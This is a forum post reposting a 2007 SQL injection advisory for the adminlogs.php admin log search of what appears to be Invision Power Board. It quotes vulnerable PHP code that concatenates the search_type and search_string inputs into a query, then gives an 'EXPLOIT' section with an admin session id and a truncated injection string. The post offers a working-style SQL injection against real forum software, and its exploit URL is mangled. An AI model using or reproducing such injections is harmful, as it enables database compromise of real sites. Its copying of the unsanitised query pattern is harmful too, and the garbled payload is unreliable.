h7t_2002- --[DEVELOPER]--
- Tổng số bài gửi : 67
Join date : 01/06/2009
Age : 33
Đến từ : /dev/null
by h7t_2002 Thu Jul 15, 2010 7:23 am
- Code:
-------------
adminlogs.php
-------------
BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007
/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* else
* {
* $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
* $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
* $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
* $row_count = $row['count'];
*
* $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
* $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
* $this->ipsclass->DB->cache_exec_query();
* }
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*
*/
EXPLOIT
-------
adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to admin panel you open admin session and you can see it in variable "adsess="
Replace the "adsess=" in url with your own
[localhost]())))--